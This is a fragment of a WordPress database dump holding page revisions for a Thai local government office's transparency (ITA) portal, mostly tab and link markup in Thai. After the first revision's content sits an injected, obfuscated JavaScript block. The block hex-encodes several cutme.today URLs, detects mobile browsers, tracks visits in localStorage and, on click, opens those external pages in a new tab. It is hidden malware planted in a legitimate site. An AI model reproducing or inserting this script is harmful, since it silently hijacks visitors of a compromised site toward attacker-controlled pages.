data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 08:46:05','2024-08-20 01:46:05','',871,'http://pakhaeng.ssk.in.th/?p=885',0,'revision','',0),
(887,1,'2024-08-20 08:49:04','2024-08-20 01:49:04','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":5,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-5 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- 